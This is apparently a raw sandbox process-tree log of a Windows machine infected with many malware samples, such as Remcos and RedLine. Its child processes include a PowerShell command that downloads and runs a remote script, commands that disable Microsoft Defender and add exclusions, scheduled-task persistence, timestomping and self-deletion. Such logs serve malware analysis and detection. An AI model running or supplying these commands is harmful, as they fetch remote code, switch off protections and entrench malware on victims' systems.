- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
    3⤵
    PID:4828
- C:\Users\Admin\AppData\Local\Temp\a\ceshi.exe
  "C:\Users\Admin\AppData\Local\Temp\a\ceshi.exe"
  2⤵
  PID:3152
- - C:\Program Files (x86)\Microsoft Krptvw\Mxqekzr.exe
    "C:\Program Files (x86)\Microsoft Krptvw\Mxqekzr.exe"
    3⤵
    PID:6900
- C:\Windows\SysWOW64\rundll32.exe
  "C:\Windows\SysWOW64\rundll32.exe"
  2⤵
  PID:4320
- - C:\Program Files\Mozilla Firefox\Firefox.exe
    "C:\Program Files\Mozilla Firefox\Firefox.exe"
    3⤵
    PID:5672
  - - C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 5672 -s 124
      4⤵
      Program crash
      PID:596
- C:\Windows\SysWOW64\help.exe
  "C:\Windows\SysWOW64\help.exe"
  2⤵
  PID:4852
- - C:\Program Files\Mozilla Firefox\Firefox.exe
    "C:\Program Files\Mozilla Firefox\Firefox.exe"
    3⤵
    PID:5772
  - - C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 5772 -s 460
      4⤵
      Program crash
      PID:5280
- C:\Windows\SysWOW64\msiexec.exe
  "C:\Windows\SysWOW64\msiexec.exe"
  2⤵
  PID:4856
- C:\Users\Admin\AppData\Local\Temp\a\88999.exe
  "C:\Users\Admin\AppData\Local\Temp\a\88999.exe"
  2⤵
  PID:3868
- - C:\Program Files (x86)\Microsoft Efxkgq\Evnagqb.com
    "C:\Program Files (x86)\Microsoft Efxkgq\Evnagqb.com"
    3⤵
    PID:4664
- C:\Users\Admin\AppData\Local\Temp\a\YYY.exe
  "C:\Users\Admin\AppData\Local\Temp\a\YYY.exe"
  2⤵
  PID:2164
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
    3⤵
    PID:4388
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
    3⤵
    PID:2900
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
    3⤵
    PID:4048
- C:\Users\Admin\AppData\Local\Temp\a\Installer.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Installer.exe"
  2⤵
  PID:4212
- C:\Users\Admin\AppData\Local\Temp\a\1.exe
  "C:\Users\Admin\AppData\Local\Temp\a\1.exe"
  2⤵
  PID:1264
- C:\Users\Admin\AppData\Local\Temp\a\w-9.exe
  "C:\Users\Admin\AppData\Local\Temp\a\w-9.exe"
  2⤵
  PID:4316
- C:\Users\Admin\AppData\Local\Temp\a\secmorganzx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\secmorganzx.exe"
  2⤵
  PID:2920
- C:\Users\Admin\AppData\Local\Temp\a\hkcmd.exe
  "C:\Users\Admin\AppData\Local\Temp\a\hkcmd.exe"
  2⤵
  PID:1420
- C:\Users\Admin\AppData\Local\Temp\a\Dollar.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Dollar.exe"
  2⤵
  PID:1076
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
    3⤵
    PID:2340
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
    3⤵
    PID:1288
- C:\Users\Admin\AppData\Local\Temp\a\H2.exe
  "C:\Users\Admin\AppData\Local\Temp\a\H2.exe"
  2⤵
  PID:4952
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
    3⤵
    PID:4928
  - - C:\Users\Admin\AppData\Local\Temp\Remcos\remcos.exe
      "C:\Users\Admin\AppData\Local\Temp\Remcos\remcos.exe"
      4⤵
      PID:4680
- C:\Users\Admin\AppData\Local\Temp\a\2.exe
  "C:\Users\Admin\AppData\Local\Temp\a\2.exe"
  2⤵
  PID:1616
- C:\Users\Admin\AppData\Local\Temp\a\teambzx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\teambzx.exe"
  2⤵
  PID:2812
- - C:\Users\Admin\AppData\Local\Temp\a\teambzx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\teambzx.exe"
    3⤵
    PID:4316
- C:\Users\Admin\AppData\Local\Temp\a\cc.exe
  "C:\Users\Admin\AppData\Local\Temp\a\cc.exe"
  2⤵
  PID:1540
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1540 -s 900
    3⤵
    - Program crash
    PID:7524
- C:\Users\Admin\AppData\Local\Temp\a\WindowsApp1.exe
  "C:\Users\Admin\AppData\Local\Temp\a\WindowsApp1.exe"
  2⤵
  PID:5828
- C:\Users\Admin\AppData\Local\Temp\a\hkcmd.exe
  "C:\Users\Admin\AppData\Local\Temp\a\hkcmd.exe"
  2⤵
  PID:6104
- - C:\Users\Admin\AppData\Local\Temp\a\hkcmd.exe
    "C:\Users\Admin\AppData\Local\Temp\a\hkcmd.exe"
    3⤵
    PID:6436
- C:\Users\Admin\AppData\Local\Temp\a\M.exe
  "C:\Users\Admin\AppData\Local\Temp\a\M.exe"
  2⤵
  PID:4360
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
    3⤵
    PID:5312
- C:\Users\Admin\AppData\Local\Temp\a\ga.exe
  "C:\Users\Admin\AppData\Local\Temp\a\ga.exe"
  2⤵
  PID:4016
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
    3⤵
    PID:5448
- C:\Users\Admin\AppData\Local\Temp\a\Nano.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Nano.exe"
  2⤵
  PID:3872
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
    3⤵
    PID:5904
- C:\Users\Admin\AppData\Local\Temp\a\agodzx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\agodzx.exe"
  2⤵
  PID:5728
- - C:\Users\Admin\AppData\Local\Temp\a\agodzx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\agodzx.exe"
    3⤵
    PID:6728
- C:\Users\Admin\AppData\Local\Temp\a\smss.exe
  "C:\Users\Admin\AppData\Local\Temp\a\smss.exe"
  2⤵
  PID:5784
- - C:\Users\Admin\AppData\Local\Temp\a\smss.exe
    "C:\Users\Admin\AppData\Local\Temp\a\smss.exe"
    3⤵
    PID:5168
- C:\Users\Admin\AppData\Local\Temp\a\R.exe
  "C:\Users\Admin\AppData\Local\Temp\a\R.exe"
  2⤵
  PID:5896
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
    3⤵
    PID:2168
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
    3⤵
    PID:5264
- C:\Users\Admin\AppData\Local\Temp\a\ar.exe
  "C:\Users\Admin\AppData\Local\Temp\a\ar.exe"
  2⤵
  PID:3148
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
    3⤵
    PID:5296
- C:\Users\Admin\AppData\Local\Temp\a\ARR.exe
  "C:\Users\Admin\AppData\Local\Temp\a\ARR.exe"
  2⤵
  PID:5244
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
    3⤵
    PID:4668
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
    3⤵
    PID:5024
- C:\Users\Admin\AppData\Local\Temp\a\D.exe
  "C:\Users\Admin\AppData\Local\Temp\a\D.exe"
  2⤵
  PID:5492
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
    3⤵
    PID:5920
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
    3⤵
    PID:1576
- C:\Users\Admin\AppData\Local\Temp\a\NEV.exe
  "C:\Users\Admin\AppData\Local\Temp\a\NEV.exe"
  2⤵
  PID:5332
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
    3⤵
    PID:5584
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
    3⤵
    PID:3456
- C:\Users\Admin\AppData\Local\Temp\a\ogumbgejapxd.exe
  "C:\Users\Admin\AppData\Local\Temp\a\ogumbgejapxd.exe"
  2⤵
  PID:5428
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\AppData\Local\Temp\a\ogumbgejapxd.exe
    3⤵
    PID:5264
  - - C:\Windows\system32\choice.exe
      choice /C Y /N /D Y /T 0
      4⤵
      PID:2336
- C:\Users\Admin\AppData\Local\Temp\a\jokerzx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\jokerzx.exe"
  2⤵
  PID:2488
- - C:\Users\Admin\AppData\Local\Temp\a\jokerzx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\jokerzx.exe"
    3⤵
    PID:6072
- C:\Users\Admin\AppData\Local\Temp\a\ventascry.exe
  "C:\Users\Admin\AppData\Local\Temp\a\ventascry.exe"
  2⤵
  PID:6096
- - C:\Users\Admin\AppData\Local\Temp\a\ventascry.exe
    "C:\Users\Admin\AppData\Local\Temp\a\ventascry.exe"
    3⤵
    PID:5708
- C:\Users\Admin\AppData\Local\Temp\a\wasx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\wasx.exe"
  2⤵
  PID:2120
- - C:\Users\Admin\AppData\Local\Temp\a\wasx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\wasx.exe"
    3⤵
    PID:4952
- C:\Users\Admin\AppData\Local\Temp\a\dd.exe
  "C:\Users\Admin\AppData\Local\Temp\a\dd.exe"
  2⤵
  PID:3208
- - C:\Users\Admin\AppData\Local\Temp\a\dd.exe
    "C:\Users\Admin\AppData\Local\Temp\a\dd.exe"
    3⤵
    PID:3720
- C:\Users\Admin\AppData\Local\Temp\a\postmon.exe
  "C:\Users\Admin\AppData\Local\Temp\a\postmon.exe"
  2⤵
  PID:4568
- - C:\Windows\System32\cmd.exe
    "C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://transparenciacanaa.com.br/cidadejunina/js/vendor/debug2.ps1')"
    3⤵
    PID:5904
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command IEX(New-Object Net.Webclient).DownloadString('https://transparenciacanaa.com.br/cidadejunina/js/vendor/debug2.ps1')
      4⤵
      PID:5628
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\a\postmon.exe" >> NUL
    3⤵
    PID:1976
  - - C:\Windows\SysWOW64\PING.EXE
      ping 127.0.0.1
      4⤵
      Runs ping.exe
      PID:6884
- C:\Users\Admin\AppData\Local\Temp\a\red.exe
  "C:\Users\Admin\AppData\Local\Temp\a\red.exe"
  2⤵
  PID:1896
- C:\Users\Admin\AppData\Local\Temp\a\Facebook.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Facebook.exe"
  2⤵
  PID:2280
- C:\Users\Admin\AppData\Local\Temp\a\fristname.exe
  "C:\Users\Admin\AppData\Local\Temp\a\fristname.exe"
  2⤵
  PID:4800
- - C:\Users\Admin\AppData\Local\Temp\ae3108e6c23af96b9aac776041f0203a.exe
    "C:\Users\Admin\AppData\Local\Temp\ae3108e6c23af96b9aac776041f0203a.exe"
    3⤵
    PID:2976
- - C:\Users\Admin\AppData\Local\Temp\BitDefendMS.exe
    "C:\Users\Admin\AppData\Local\Temp\BitDefendMS.exe"
    3⤵
    PID:5088
- - C:\Users\Admin\AppData\Local\Temp\Builtt.exe
    "C:\Users\Admin\AppData\Local\Temp\Builtt.exe"
    3⤵
    PID:4100
  - - C:\Users\Admin\AppData\Local\Temp\Builtt.exe
      "C:\Users\Admin\AppData\Local\Temp\Builtt.exe"
      4⤵
      PID:5788
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "net session"
        5⤵
        
        PID:3752
      - C:\Windows\system32\net.exe
        
        net session
        6⤵
        
        PID:6940
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        7⤵
        
        PID:6348
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "start bound.exe"
        5⤵
        
        PID:6340
      - C:\Users\Admin\AppData\Local\Temp\bound.exe
        
        bound.exe
        6⤵
        
        PID:7648
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        5⤵
        
        PID:6964
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        6⤵
        
        PID:5948
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        5⤵
        
        PID:6480
      - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        6⤵
        Enumerates processes with tasklist
        
        PID:3752
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
        5⤵
        
        PID:2256
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
        6⤵
        
        PID:7420
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"
        5⤵
        
        PID:6332
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        6⤵
        
        PID:7696
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Builtt.exe'"
        5⤵
        
        PID:920
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Builtt.exe'
        6⤵
        
        PID:3532
- C:\Users\Admin\AppData\Local\Temp\a\IE_CACHE.exe
  "C:\Users\Admin\AppData\Local\Temp\a\IE_CACHE.exe"
  2⤵
  PID:3516
- C:\Users\Admin\AppData\Local\Temp\a\wall.exe
  "C:\Users\Admin\AppData\Local\Temp\a\wall.exe"
  2⤵
  PID:5428
- - C:\Users\Admin\AppData\Local\Temp\aafg31.exe
    "C:\Users\Admin\AppData\Local\Temp\aafg31.exe"
    3⤵
    PID:3176
- - C:\Users\Admin\AppData\Local\Temp\oldplayer.exe
    "C:\Users\Admin\AppData\Local\Temp\oldplayer.exe"
    3⤵
    PID:5872
  - - C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
      "C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe"
      4⤵
      PID:3864
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe" /F
        5⤵
        Creates scheduled task(s)
        
        PID:6264
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\207aa4515d" /P "Admin:N"&&CACLS "..\207aa4515d" /P "Admin:R" /E&&Exit
        5⤵
        
        PID:6304
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        6⤵
        
        PID:7744
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "oneetx.exe" /P "Admin:N"
        6⤵
        
        PID:8152
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "oneetx.exe" /P "Admin:R" /E
        6⤵
        
        PID:6544
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        6⤵
        
        PID:7692
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\207aa4515d" /P "Admin:N"
        6⤵
        
        PID:8196
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\207aa4515d" /P "Admin:R" /E
        6⤵
        
        PID:8656
    - - C:\Users\Admin\AppData\Local\Temp\1000001001\toolspub2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000001001\toolspub2.exe"
        5⤵
        
        PID:6364
      - C:\Users\Admin\AppData\Local\Temp\1000001001\toolspub2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000001001\toolspub2.exe"
        6⤵
        
        PID:7232
    - - C:\Users\Admin\AppData\Local\Temp\1000002001\3eef203fb515bda85f514e168abb5973.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000002001\3eef203fb515bda85f514e168abb5973.exe"
        5⤵
        
        PID:3196
    - - C:\Users\Admin\AppData\Local\Temp\1000003001\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000003001\setup.exe"
        5⤵
        
        PID:7068
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7068 -s 664
        6⤵
        Program crash
        
        PID:7728
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7068 -s 772
        6⤵
        Program crash
        
        PID:6604
- - C:\Users\Admin\AppData\Local\Temp\XandETC.exe
    "C:\Users\Admin\AppData\Local\Temp\XandETC.exe"
    3⤵
    PID:4692
- C:\Users\Admin\AppData\Local\Temp\a\WWW3_64.exe
  "C:\Users\Admin\AppData\Local\Temp\a\WWW3_64.exe"
  2⤵
  PID:5228
- C:\Users\Admin\AppData\Local\Temp\a\gogw.exe
  "C:\Users\Admin\AppData\Local\Temp\a\gogw.exe"
  2⤵
  PID:1556
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell "" "SCHTASKS.exe /Create /SC MINUTE /ED 12/12/2030 /TN MicrosoftEdgeUpdateTaskMachineUARun.exe /TR C:\Users\Admin\AppData\Roaming\Microsoft\config\MicrosoftEdgeUpdateTaskMachineUARun.exe"
    3⤵
    PID:3508
  - - C:\Windows\system32\schtasks.exe
      "C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /ED 12/12/2030 /TN MicrosoftEdgeUpdateTaskMachineUARun.exe /TR C:\Users\Admin\AppData\Roaming\Microsoft\config\MicrosoftEdgeUpdateTaskMachineUARun.exe
      4⤵
      Creates scheduled task(s)
      PID:6312
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell "" "Set-ItemProperty -Path \"C:\Users\Admin\AppData\Roaming\Microsoft\config\MicrosoftEdgeUpdateTaskMachineUARun.exe\" -Name CreationTime -Value \"06/13/2022 3:16 PM\""
    3⤵
    PID:6872
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell "" "Set-ItemProperty -Path \"C:\Users\Admin\AppData\Roaming\Microsoft\config\MicrosoftEdgeUpdateTaskMachineUARun.exe\" -Name LastWriteTime -Value \"06/13/2022 3:16 PM\""
    3⤵
    PID:7416
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell "" "Set-ItemProperty -Path \"C:\Users\Admin\AppData\Roaming\Microsoft\config\MicrosoftEdgeUpdateTaskMachineUARun.exe\" -Name LastAccessTime -Value \"06/13/2022 3:16 PM\""
    3⤵
    PID:6192
- C:\Users\Admin\AppData\Local\Temp\a\trust.exe
  "C:\Users\Admin\AppData\Local\Temp\a\trust.exe"
  2⤵
  PID:1220
- C:\Users\Admin\AppData\Local\Temp\a\aaa1.exe
  "C:\Users\Admin\AppData\Local\Temp\a\aaa1.exe"
  2⤵
  PID:372
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
    3⤵
    PID:6796
- C:\Users\Admin\AppData\Local\Temp\a\crypted.exe
  "C:\Users\Admin\AppData\Local\Temp\a\crypted.exe"
  2⤵
  PID:3940
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
    3⤵
    PID:7008
- C:\Users\Admin\AppData\Local\Temp\a\netTime.exe
  "C:\Users\Admin\AppData\Local\Temp\a\netTime.exe"
  2⤵
  PID:6356
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
    3⤵
    PID:1856
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
    3⤵
    PID:6292
- - C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -u -p 6356 -s 996
    3⤵
    - Program crash
    PID:3500
- C:\Users\Admin\AppData\Local\Temp\a\tg.exe
  "C:\Users\Admin\AppData\Local\Temp\a\tg.exe"
  2⤵
  PID:6592
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 6592 -s 288
    3⤵
    - Program crash
    PID:7348
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
    3⤵
    PID:6780
- C:\Users\Admin\AppData\Local\Temp\a\putty.exe
  "C:\Users\Admin\AppData\Local\Temp\a\putty.exe"
  2⤵
  PID:6848
- C:\Users\Admin\AppData\Local\Temp\a\v.exe
  "C:\Users\Admin\AppData\Local\Temp\a\v.exe"
  2⤵
  PID:6236
- - C:\Program Files (x86)\Google\Temp\GUM9219.tmp\GoogleUpdate.exe
    "C:\Program Files (x86)\Google\Temp\GUM9219.tmp\GoogleUpdate.exe" /installsource taggedmi /install "appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}&iid={4611E087-CB70-244B-9202-F605357A02F4}&lang=en&browser=5&usagestats=1&appname=Google%20Chrome&needsadmin=prefers&ap=x64-stable-statsdef_1&brand=CHBF&installdataindex=empty"
    3⤵
    PID:7088
  - - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
      "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /regsvc
      4⤵
      PID:7444
  - - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
      "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /regserver
      4⤵
      PID:2332
    - - C:\Program Files (x86)\Google\Update\1.3.36.122\GoogleUpdateComRegisterShell64.exe
        
        "C:\Program Files (x86)\Google\Update\1.3.36.122\GoogleUpdateComRegisterShell64.exe"
        5⤵
        
        PID:5192
    - - C:\Program Files (x86)\Google\Update\1.3.36.122\GoogleUpdateComRegisterShell64.exe
        
        "C:\Program Files (x86)\Google\Update\1.3.36.122\GoogleUpdateComRegisterShell64.exe"
        5⤵
        
        PID:7432
    - - C:\Program Files (x86)\Google\Update\1.3.36.122\GoogleUpdateComRegisterShell64.exe
        
        "C:\Program Files (x86)\Google\Update\1.3.36.122\GoogleUpdateComRegisterShell64.exe"
        5⤵
        
        PID:8120
  - - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
      "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4zNi4xMjIiIHNoZWxsX3ZlcnNpb249IjEuMy4zNi4xMjEiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7NzNBQjkyQ0YtMjE3Mi00REVCLUE0NzEtMDNCODVERkMwODVDfSIgdXNlcmlkPSJ7MEE3QzRDQUUtNzBGRS00MjBGLUFDMDMtNUQ3NjBGNkE5QUJFfSIgaW5zdGFsbHNvdXJjZT0idGFnZ2VkbWkiIHJlcXVlc3RpZD0iezhGNUU0Q0EwLTMwQjktNEJFRC1BMEQ5LUU0QTFFOTA1QzkwOH0iIGRlZHVwPSJjciIgZG9tYWluam9pbmVkPSIwIj48aHcgcGh5c21lbW9yeT0iOCIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xNTA2My4wIiBzcD0iIiBhcmNoPSJ4NjQiLz48YXBwIGFwcGlkPSJ7NDMwRkQ0RDAtQjcyOS00RjYxLUFBMzQtOTE1MjY0ODE3OTlEfSIgdmVyc2lvbj0iMS4zLjM2LjE1MSIgbmV4dHZlcnNpb249IjEuMy4zNi4xMjIiIGxhbmc9ImVuIiBicmFuZD0iQ0hCRiIgY2xpZW50PSIiIGlpZD0iezQ2MTFFMDg3LUNCNzAtMjQ0Qi05MjAyLUY2MDUzNTdBMDJGNH0iPjxldmVudCBldmVudHR5cGU9IjIiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIGluc3RhbGxfdGltZV9tcz0iMjQ3MTAiLz48L2FwcD48L3JlcXVlc3Q-
      4⤵
      PID:5396
  - - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
      "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /handoff "appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}&iid={4611E087-CB70-244B-9202-F605357A02F4}&lang=en&browser=5&usagestats=1&appname=Google%20Chrome&needsadmin=prefers&ap=x64-stable-statsdef_1&brand=CHBF&installdataindex=empty" /installsource taggedmi /sessionid "{73AB92CF-2172-4DEB-A471-03B85DFC085C}"
      4⤵
      PID:3744
- C:\Users\Admin\AppData\Local\Temp\a\INTERNET.exe
  "C:\Users\Admin\AppData\Local\Temp\a\INTERNET.exe"
  2⤵
  PID:6652
- C:\Users\Admin\AppData\Local\Temp\a\mslink1.exe
  "C:\Users\Admin\AppData\Local\Temp\a\mslink1.exe"
  2⤵
  PID:6464
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 6464 -s 972
    3⤵
    - Program crash
    PID:4980
- C:\Users\Admin\AppData\Local\Temp\a\oceanzx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\oceanzx.exe"
  2⤵
  PID:6676
- - C:\Users\Admin\AppData\Local\Temp\a\oceanzx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\oceanzx.exe"
    3⤵
    PID:2292
- - C:\Users\Admin\AppData\Local\Temp\a\oceanzx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\oceanzx.exe"
    3⤵
    PID:4708
- C:\Users\Admin\AppData\Local\Temp\a\macrigan2.1.exe
  "C:\Users\Admin\AppData\Local\Temp\a\macrigan2.1.exe"
  2⤵
  PID:5400
- - C:\Users\Admin\AppData\Local\Temp\a\macrigan2.1.exe
    "C:\Users\Admin\AppData\Local\Temp\a\macrigan2.1.exe"
    3⤵
    PID:8080
- C:\Users\Admin\AppData\Local\Temp\a\p0aw25.exe
  "C:\Users\Admin\AppData\Local\Temp\a\p0aw25.exe"
  2⤵
  PID:7788
- C:\Users\Admin\AppData\Local\Temp\a\clp6.exe
  "C:\Users\Admin\AppData\Local\Temp\a\clp6.exe"
  2⤵
  PID:8124
- - C:\ProgramData\h5gb4fg\g3f31sd.exe
    C:\ProgramData\h5gb4fg\g3f31sd.exe
    3⤵
    PID:3636
- C:\Users\Admin\AppData\Local\Temp\a\redline.exe
